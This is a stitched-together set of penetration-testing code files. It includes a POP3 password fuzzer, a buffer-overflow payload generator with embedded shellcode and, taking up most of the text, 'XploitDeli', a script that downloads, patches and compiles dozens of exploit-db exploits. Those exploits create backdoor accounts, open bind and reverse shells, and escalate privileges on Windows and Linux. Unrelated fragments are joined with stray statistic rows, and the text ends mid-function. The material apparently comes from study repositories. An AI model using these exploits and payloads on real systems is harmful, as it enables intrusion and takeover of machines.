        LIGHT_CYAN = '\033[1;36m'
        RED = '\033[0;31m'
        LIGHT_RED = '\033[1;31m'
        PURPLE = '\033[0;35m'
        LIGHT_PURPLE = '\033[1;35m'
        BROWN = '\033[0;33m'
        YELLOW = '\033[1;33m'
        WHITE = '\033[1;37m'
        DEFAULT_COLOR = '\033[00m'
        RED_BOLD = '\033[01;31m'
        ENDC = '\033[0m'
    def printRed(mess):
        # Strip the caller's trailing CR/LF; print adds its own newline.
        mess=mess.strip('\r\n')
        print colors.RED + mess + colors.ENDC
    def printPink(mess):
        # NOTE(review): despite the name, this prints in BLUE.
        mess=mess.strip('\r\n')
        print colors.BLUE + mess+ colors.ENDC
    def printGreen(mess):
        mess=mess.strip('\r\n')
        print colors.GREEN + mess + colors.ENDC
if platform.system()=='Windows':
    # Windows console: colour via the kernel32 SetConsoleTextAttribute API.
    STD_INPUT_HANDLE = -10
    STD_OUTPUT_HANDLE = -11
    STD_ERROR_HANDLE = -12
    # Console character attribute flags.
    FOREGROUND_BLACK = 0x0
    FOREGROUND_BLUE = 0x01 # text color contains blue.
    FOREGROUND_GREEN = 0x02 # text color contains green.
    FOREGROUND_RED = 0x04 # text color contains red.
    FOREGROUND_INTENSITY = 0x08 # text color is intensified.
    BACKGROUND_BLUE = 0x10 # background color contains blue.
    BACKGROUND_GREEN = 0x20 # background color contains green.
    BACKGROUND_RED = 0x40 # background color contains red.
    BACKGROUND_INTENSITY = 0x80 # background color is intensified.
    std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
    def set_cmd_text_color(color, handle=std_out_handle):
        # Returns non-zero on success (Win32 BOOL).
        Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
        return Bool
    def resetColor():
        # Back to the default white-on-black attribute.
        set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
    def printRed(mess):
        set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
        sys.stdout.write(mess)
        resetColor()
    def printPink(mess):
        # Red+blue == magenta/pink.
        set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY)
        print(mess)
        resetColor()
    def printGreen(mess):
        set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
        sys.stdout.write(mess)
        resetColor()
| 31.063291 | 82 | 0.584518 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
# Fuzz the POP3 PASS command with "A" strings of growing length
# (1, 100, 300, 500, ... bytes) against a hard-coded target, looking
# for a crash (Python 2 script).
buffer=["A"]
counter=100
while len(buffer)<=30:
    buffer.append("A"*counter)
    counter=counter+200
for string in buffer:
    print"Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect(('192.168.250.158',110))
    data=s.recv(1024)
    #print str(data)
    s.send('USER root\r\n')
    data=s.recv(1024)
    print str(data)
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()
| 17.964286 | 54 | 0.596226 |
owtf | from owtf.plugin.helper import plugin_helper
# Short summary shown by the OWTF plugin framework.
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Return placeholder HTML content for this manual-assistance plugin."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | numberOfEggs = 12
if numberOfEggs < 4:
print('That is not that many eggs.')
elif numberOfEggs < 20:
print('You have quite a few eggs.')
elif numberOfEggs == 144:
print('You have a lot of eggs. Gross!')
else:
print('Eat ALL the eggs!')
| 25.1 | 44 | 0.638462 |
Penetration-Testing-Study-Notes | prefix = "\\x41" * 80
eip = "\\x42" * 4
nop = "\\x90" * (400 - 137)
buf = ""
buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31"
buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68"
buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\xb9\\xdd\\x29\\x7d\\x33"
buf += "\\x3e\\x4f\\xfc\\xa0\\xc1\\x60\\x33\\xa6\\xf3\\x5b\\x3c\\x44\\xa0"
buf += "\\x18\\x91\\xe1\\x45\\x16\\xf4\\x46\\x2f\\xe5\\x76\\xf7\\xda\\xf1"
buf += "\\x22\\x92\\x18\\x90\\xcb\\x32\\x8a\\xed\\x2a\\xd8\\xba\\xb6\\xc6"
buf += "\\x7b\\x9b\\x85\\x96\\x13\\x98\\xd2\\x82\\x42\\xc4\\x84\\xf8\\x1c"
buf += "\\xf8\\x38\\xed\\x80\\x96\\x28\\x5c\\x69\\xee\\xa8\\x34\\xef\\xa8"
buf += "\\xe7\\x48\\x3e\\xab\\x48\\x2e\\x0c\\xac\\xf9\\xed\\x3e\\xcb\\x70"
buf += "\\xa0\\x3a\\xd9\\x03\\xd1\\xf5\\xed\\xb3\\xd6\\x34\\x6d\\x34\\x07"
buf += "\\x9d\\xde\\x3d\\x7a\\xa2\\xe0\\xa3"
payload = prefix + eip + nop + buf
print(payload)
with open('payload.txt', 'w') as f:
hex_content = f.write(payload)
| 44.318182 | 74 | 0.558233 |
Penetration-Testing-Study-Notes | #!/usr/bin/python
###################################################
#
# XploitDeli - written by Justin Ohneiser
# ------------------------------------------------
# This program produces a variety of exploits
# found on exploit-db for immediate use.
#
# Note: options with an asterisk either don't work
# or require compilation on the target.
#
# [Warning]:
# This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
# I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
# functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
# target machines in a lab environment so please only use it against systems for which you have permission!!
#-------------------------------------------------------------------------------------------------------------
# [Modification, Distribution, and Attribution]:
# You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
# author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
# worth anything anyway :)
#
# Designed for use in Kali Linux 4.6.0-kali1-686
###################################################
import sys, os, subprocess
# ------------------------------------
# WINDOWS REMOTE
# ------------------------------------
def windows_exploit_suggester():
    """Fetch GDSSecurity's Windows Exploit Suggester and update its database."""
    commands = [
        ('Downloading...','wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
        ('Upacking...','unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
        ('Updating...','./windows-exploit-suggester.py -u'),
        ('Cleaning up...','rm master.zip; rm -r Windows-Exploit-Suggester-master')
    ]
    if run(commands):
        printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")
def ms03_026():
    """Download and cross-compile the MS03-026 DCOM RPC exploit (EDB 100)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
        ('Cleaning up...','rm ms03-026.c')
    ]
    if run(commands):
        printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")
def ms03_039_1():
    """Download and cross-compile the first MS03-039 variant (EDB 103)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
        ('Cleaning up...','rm ms03-039.c')
    ]
    if run(commands):
        printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
def ms03_039_2():
    """Download and cross-compile the C++ MS03-039 variant (EDB 109)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
        ('Compiling...','i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
        ('Cleaning up...','rm ms03-039.cpp')
    ]
    if run(commands):
        printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
def ms03_049():
    """Download and cross-compile the MS03-049 exploit (EDB 119)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
        ('Cleaning up...','rm ms03-049.c')
    ]
    if run(commands):
        # Bug fix: the message previously claimed "ms03-039.exe", but the
        # artifact produced above is ms03-049.exe.
        printGood("ms03-049.exe successfully created\n\t - spawns bind shell on port 5555")
def ms04_007():
    """Download and unpack the MS04-007 'kill-bill' Perl exploit (EDB 3022)."""
    commands = [
        ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
        ('Unpacking...','tar xvzf ms04-007.tar.gz'),
        ('Cleaning up...','rm ms04-007.tar.gz')
    ]
    if run(commands):
        printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")
def ms04_011_sslbof():
    """Download and cross-compile the MS04-011 SSL BoF exploit (EDB 275)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
        ('Cleaning up...','rm ms04-011.c')
    ]
    if run(commands):
        printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")
def ms04_011_lsasarv():
    """Download and cross-compile the MS04-011 lsasarv.dll exploit (EDB 295)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
        ('Cleaning up...','rm ms04-011.c')
    ]
    if run(commands):
        printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")
def ms04_031():
    """Download and cross-compile the MS04-031 exploit (EDB 734)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
        ('Cleaning up...','rm ms04-031.c')
    ]
    if run(commands):
        printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")
def ms05_017():
    """Download and cross-compile the MS05-017 exploit (EDB 1075)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
        ('Cleaning up...','rm ms05-017.c')
    ]
    if run(commands):
        printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")
def ms05_039():
    """Download and cross-compile the MS05-039 exploit (EDB 1149)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
        ('Cleaning up...','rm ms05-039.c')
    ]
    if run(commands):
        printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")
def ms06_040_1():
    """Download and cross-compile the first MS06-040 variant (EDB 2223)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
        ('Cleaning up...','rm ms06-040.c')
    ]
    if run(commands):
        printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")
def ms06_040_2():
    """Download, patch (sed out the WNet check), and compile MS06-040 (EDB 2265)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
        ('Fixing...',"sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
        ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
        ('Cleaning up...','rm ms06-040.c')
    ]
    if run(commands):
        printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")
def ms06_070():
    """Download, patch broken source lines with sed, and compile MS06-070 (EDB 2789)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
        ('Fixing...',"sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
        ('Compiling...','i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
        ('Cleaning up...','rm ms06-070.c')
    ]
    if run(commands):
        printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")
def ms08_067_1():
    """Download and cross-compile the C MS08-067 variant (EDB 7104)."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
        ('Compiling...','i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
        ('Cleaning up...','rm ms08-067.c')
    ]
    if run(commands):
        printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")
def ms08_067_2():
    """Download the Python MS08-067 variant (EDB 7132) and mark it executable."""
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
        ('Preparing...','chmod 744 ms08-067.py')
    ]
    if run(commands):
        printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")
def ms08_067_3():
    """Download and unpack the prebuilt MS08-067 binary (EDB 6841 rar)."""
    commands = [
        ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
        ('Unpacking...','mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
        ('Cleaning up...','rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067')
    ]
    if run(commands):
        printGood("ms08-067.exe successfully created\n\t")
def ms09_050():
    """Download, unpack, and cross-compile the MS09-050 SMB2 exploit (EDB 14674)."""
    commands = [
        ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
        ('Unpacking...','unzip ms09-050.zip'),
        ('Cleaning up...','rm ms09-050.zip'),
        ('Compiling...','cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32')
    ]
    if run(commands):
        printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")
# (menu label, builder function) pairs for the Windows remote exploits.
# Labels starting with '*' are flagged in the file header as either not
# working or requiring compilation on the target.
exploits_windows_remote = [
    ("windows_exploit_suggester" , windows_exploit_suggester),
    ("ms03-026" , ms03_026),
    ("ms03-039 (1)" , ms03_039_1),
    ("ms03-039 (2)" , ms03_039_2),
    ("*ms03-049" , ms03_049),
    ("ms04-007" , ms04_007),
    ("ms04-011 - ssl bof" , ms04_011_sslbof),
    ("ms04-011 - lsasarv.dll" , ms04_011_lsasarv),
    ("ms04-031" , ms04_031),
    ("ms05-017" , ms05_017),
    ("ms05-039" , ms05_039),
    ("*ms06-040 (1)" , ms06_040_1),
    ("ms06-040 (2)" , ms06_040_2),
    ("ms06-070" , ms06_070),
    ("*ms08-067 (1)" , ms08_067_1),
    ("ms08-067 (2)" , ms08_067_2),
    ("ms08-067 (3)" , ms08_067_3),
    ("*ms09-050" , ms09_050)
    ]
# ------------------------------------
# WINDOWS LOCAL
# ------------------------------------
def windows_privesc_check():
    """Fetch pentestmonkey's windows-privesc-check and keep only the exe."""
    steps = [
        ('Downloading...', 'wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
        ('Unpacking', 'unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
        ('Cleaning up...', 'rm windows-privesc-check.zip; rm -r windows-privesc-check-master'),
    ]
    if run(steps):
        printGood("windows-privesc-check2.exe successfully created")
def ms04_011_local():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
('Fixing...',"sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
('Cleaning up...','rm ms04-011.c')
]
if run(commands):
printGood("ms04-011.exe successfully created\n\t")
def ms04_019_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
('Fixing...',"sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
('Cleaning up...','rm ms04-019.c')
]
if run(commands):
printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")
def ms04_019_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
('Cleaning up...','rm ms04-019.c')
]
if run(commands):
printGood("ms04-019.exe successfully created\n\t")
def ms04_019_3():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
('Cleaning up...','rm ms04-019.c')
]
if run(commands):
printGood("ms04-019.exe successfully created\n\t")
def ms04_020():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
('Fixing...',"sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
('Compiling...','i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
('Cleaning up...','rm ms04-020.c')
]
if run(commands):
printGood("ms04-020.exe successfully created\n\t")
def keybd():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1197 -O keybd.c'),
('Compiling...','i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
('Cleaning up...','rm keybd.c')
]
if run(commands):
printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")
def ms05_018():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
('Compiling...','i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
('Cleaning up...','rm ms05-018.c')
]
if run(commands):
printGood("ms05-018.exe successfully created\n\t")
def ms05_055():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
('Compiling...','i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
('Cleaning up...','rm ms05-055.c')
]
if run(commands):
printGood("ms05-055.exe successfuly created\n\t")
def ms06_030():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
('Compiling...','i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
('Cleaning up...','rm ms06-030.c')
]
if run(commands):
printGood("ms06-030.exe successfully created\n\t")
def ms06_049():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
('Compiling...','i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
('Cleaning up...','rm ms06-049.c')
]
if run(commands):
printGood("ms06-049.exe successfully created\n\t")
def spool():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/3220 -O spool.c'),
('Fixing...',"sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
('Compiling...','i686-w64-mingw32-gcc spool.c -o spool.exe'),
('Cleaning up...','rm spool.c')
]
if run(commands):
printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")
def ms08_025():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
('Unpacking...','mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
('Compiling...','cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
('Cleaning up...','rm ms08-025.zip; rm -r ms08-025')
]
if run(commands):
printGood("ms08_025.exe successfully created\n\t")
def netdde():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/21923 -O netdde.c'),
('Fixing...',"sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
('Compiling...','i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
('Cleaning up...','rm netdde.c')
]
if run(commands):
printGood("netdde.exe successfully created\n\t")
def ms10_015():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
('Unpacking...','unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
('Cleaning up...','rm ms10-015.zip; rm -r KiTrap0D')
]
if run(commands):
printGood("ms10-015.exe successfully created\n\t")
def ms10_059():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
('Unpacking...','unzip ms10-059.zip'),
('Compiling...','cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
('Cleaning up...','rm ms10-059.zip; rm -r Chimichurri')
]
if run(commands):
printGood("ms10-059.exe successfully created\n\t")
def ms10_092():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
]
if run(commands):
printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")
def ms11_080():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
('Cleaning up...','cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec')
]
if run(commands):
printGood("ms11_080.exe successfully created\n\t")
def ms14_040():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
('Cleaning up...','cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec')
]
if run(commands):
printGood("ms14-040.exe successfully created")
def ms14_058_1():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
('Unpacking...','unzip ms14-058.zip'),
('Compiling...','cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
('Cleaning up...','rm ms14-058.zip; rm -r 39666 __MACOSX')
]
if run(commands):
printGood("")
def ms14_058_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
('Cleaning up...','cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec')
]
if run(commands):
printGood("ms14-058.exe successfully created\n\t")
def ms14_070_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
('Compiling...','i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
('Cleaning up...','rm ms14-070.c')
]
if run(commands):
printGood("ms14-070.exe successfully created\n\t")
def ms14_070_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
('Note: requires manual fixing, then execute the following command:','echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\'')
]
run(commands)
def ms15_010_1():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
('Unpacking...','unzip ms15_010.zip'),
('Fixing...',"cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
('Compiling...','cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
('Cleaning up...','rm ms15_010.zip; rm -r 39035')
]
if run(commands):
printGood("ms15-010.exe successfully created\n\t")
def ms15_010_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
('Fixing...','head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
('Compiling...','i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
('Cleaning up...','rm ms15-010.cpp')
]
if run(commands):
printGood("ms15-010.exe successfully created")
def ms15_051():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe')
]
if run(commands):
printGood("ms15-051_32.exe and ms15_051_64.exe successfully created")
def ms16_014():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
('Unpacking...','unzip ms16-014.zip'),
('Compiling...','cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
('Cleaning up...','rm -r ms16-014.zip __MACOSX')
]
if run(commands):
printGood("ms16-014.exe successfully created")
def ms16_016():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
('Unpacking...','unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
('Cleaning up...','cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX')
]
if run(commands):
printGood("ms16_016.exe and Shellcode.dll successfully created")
def ms16_032():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1')
]
if run(commands):
printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")
# Menu table for local (privilege-escalation) Windows exploits:
# (display label, builder function).  Index offsets into this table are
# computed by endpoints()/select() below.
exploits_windows_local = [
    ("windows-privesc-check" , windows_privesc_check),
    ("ms04-011" , ms04_011_local),
    ("ms04-019 (1)" , ms04_019_1),
    ("ms04-019 (2)" , ms04_019_2),
    ("ms04-019 (3)" , ms04_019_3),
    ("ms04-020" , ms04_020),
    ("*keybd_event" , keybd),
    ("*ms05-018" , ms05_018),
    ("*ms05-055" , ms05_055),
    ("ms06-030" , ms06_030),
    ("ms06-049" , ms06_049),
    ("print spool service" , spool),
    ("*ms08-025" , ms08_025),
    ("netdde" , netdde),
    ("ms10-015" , ms10_015),
    ("ms10-059" , ms10_059),
    ("ms10-092" , ms10_092),
    ("ms11-080" , ms11_080),
    ("ms14-040" , ms14_040),
    ("*ms14-058 (1)" , ms14_058_1),
    ("ms14-058 (2)" , ms14_058_2),
    ("*ms14-070 (1)" , ms14_070_1),
    ("ms14-070 (2)" , ms14_070_2),
    ("*ms15-010 (1)" , ms15_010_1),
    ("*ms15-010 (2)" , ms15_010_2),
    ("ms15-051" , ms15_051),
    ("*ms16-014" , ms16_014),
    ("ms16-016" , ms16_016),
    ("ms16-032" , ms16_032)
]
# ------------------------------------
# LINUX REMOTE
# ------------------------------------
def shellshock():
    """Fetch the CVE-2014-6271 (shellshock) PoC and make it executable."""
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
        ('Preparing...', 'chmod 744 shellshock.py'),
    ]
    if run(steps):
        printGood("shellshock.py successfully created\n\t")
def heartbleed():
commands = [
('Downloading...','wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
('Compiling...','gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
('Cleaning up...','rm heartbleed.c')
]
if run(commands):
printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")
# Menu table for remote Linux exploits: (display label, builder function).
exploits_linux_remote = [
    ("shellshock" , shellshock),
    ("heartbleed" , heartbleed)
]
# ------------------------------------
# LINUX LOCAL
# -- These should be compiled on target if possible
# ------------------------------------
def linux_exploit_suggester():
    """Install the Kali linux-exploit-suggester package and copy the script locally."""
    commands = [
        # Installed via apt rather than wget; assumes a Kali/Debian host.
        ('Downloading...','apt-get install linux-exploit-suggester'),
        ('Cleaning up...','cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl')
    ]
    if run(commands):
        printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")
def unix_privesc_check():
    """Fetch pentestmonkey's unix-privesc-check and extract the script."""
    steps = [
        ('Downloading...', 'wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
        ('Unpacking...', 'tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
        ('Cleaning up...', 'rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4'),
    ]
    if run(steps):
